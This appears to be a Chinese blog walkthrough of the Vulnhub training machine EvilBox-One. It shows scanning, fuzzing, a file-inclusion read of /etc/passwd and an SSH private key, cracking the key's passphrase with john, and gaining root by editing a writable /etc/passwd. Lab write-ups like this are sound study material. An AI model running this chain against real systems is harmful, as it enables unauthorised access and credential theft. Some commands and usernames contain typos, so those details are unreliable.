kali之vulnhub,EvilBox-One

梅_花_七

已于 2022-07-09 03:13:14 修改

阅读量671

点赞数

分类专栏： Vulnhub 文章标签：安全 web安全服务器 linux

于 2022-05-19 16:20:26 首次发布

本文链接：https://blog.csdn.net/weixin_54431413/article/details/124850678

版权

Vulnhub 专栏收录该内容

31 篇文章 5 订阅

订阅专栏

一、主机发现

fping -gaq 192.168.43.27/24

二、端口扫描

sudo nmap -p- 192.168.43.250

22 ssh服务 80 http服务

三、强力扫描

sudo nmap -p22,80 -A 192.168.43.250

-A相当于 -sV -sC -O的总和，对服务版本，操作系统的扫描，-sC是开启默认脚本扫描

四、访问web服务

发现没啥可以利用的

五、目录扫描爆破

扫描一下，看看是否有隐藏目录

1.安装gobuster

（1）更新下源列表

apt-get update

（2）下载

apt-get install gobuster

2.下载渗透测试字典

seclists

3.开扫

（1）看看参数

我们使用这个扫目录文件参数dir的来扫，-w字典路径 -u 是url地址

（2）扫描

gobuster dir -u http://192.168.43.250/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

扫出来三个子目录

（3）对隐藏目录的扫描

有evil.php文件

六、访问加信息收集

访问一下都是啥都不显示，但是没报错，证明了此目录和文件是存在的。只是没有前端代码，但是有后端程序，猜测要有些参数提交才会执行后端程序。

七、参数爆破

参数分为两部分，一部分是参数名，一部分参数值，我们用ffuf来进行常用参数的爆破

1.准备参数值字典

自己创建一个常用参数值字典，写一些 1,2,4,5，a,b,c再加上一些特殊字符，看看有无惊喜。

2.ffuf跑一下

ffuf -u http://192.168.43.250/secret/evil.php?parm=dic -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:parm -w ./dic.txt:dic -fs

结果是啥都没哟，考虑后边可能是文件，进行模糊测试

3.模糊测试

ffuf -u http://192.168.43.250/secret/evil.php?FUZZ=../index.html -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 0

利用已经存在的index.html进行模糊测试，跑出来

直接跑出来一个command

八、是否文件包含？

逐渐访问看是否能访问到/etc/passwd

http://192.168.43.250/secret/evil.php?command=../../../../etc/passwd

1.存在文件包含漏洞

但是这个页面乱起八糟，看的眼晕

2.python整理下格式

f = open("huanhang.txt","r")   #设置文件对象
str = f.read()     #将txt文件的所有内容读入到字符串str中
f.close()   #将文件关闭
result=str.replace(' ','\n')
print(result)

比刚刚好点，可以看到mowree用户可以通过/bin/bash登录，尝试用mawree通过ssh登录

3.登录

ssh mowree@192.168.43.250 -v

可以看到详细信息里面有认证可以继续通过，公钥或密码，这我们知道了可以通过密钥的形式登录

九、信息收集

1.查看公私钥相应文件

这里要配合文件包含漏洞来查看公私钥文件,下面是公私钥的默认地址

公：

/home/mowree/.ssh/authorized_keys

私:

/home/mowree/.ssh/id_rsa

2.利用私钥登录

尝试利用私钥解开加密的公钥，从而通过公钥验证，登录账户

赋予权限尝试登陆，结果私钥又被加上了一道密码。

十、暴力破解id_rsa私钥的密码

1.字典

/cp /usr/share/wordlists/rockyou.txt.gz

gunzip rockyou.txt.gz

2.john工具

(1)转码

cd /usr/share/john

./ssh2join.py ~/id_rsa ~/aaa

(2)爆破

john aaa --wordlist=rockyou.txt.gz

十一、提权

成功以mowrre的身份登录，有一个flag，尝试提权

1.提权思路

（1）利用sudo -l配置缺陷

（2）uname -a 内核漏洞

（3）suid 权限继承

（4）可写入的文件

2./etc/passwd文件可写入

/etc/passwd文件可写入，所以直接修改/etc/passwd密码即可

（1）生成密码

把root的密码更改为我们生成的密码即可

openssl passwd -1 123

（2）修改/etc/passwd

删除是在vi编辑器里是x，修改成功后我们可以切换root用户了，拿到了第二个flag

flag：56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

梅_花_七

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
kali之vulnhub,EvilBox-One

一开始web页面上什么也没有，对其进行隐藏目录的扫描，发现secret和secret下的evil.php,经过测试发现这个文件具有文件包含漏洞。又从22端口下的ssh服务，发现可以用公私钥进行身份验证，我们利用文件包含漏洞查看了储存在服务器上的公私钥默认路径，利用获得的私钥进行登录，发现还有一道密码，暴力猜解加密私钥的密码，得到unicorn，登录后尝试提权，最终发现marre用户对/etc/passwd有写入权限，写入密码，成功登录。...
复制链接

扫一扫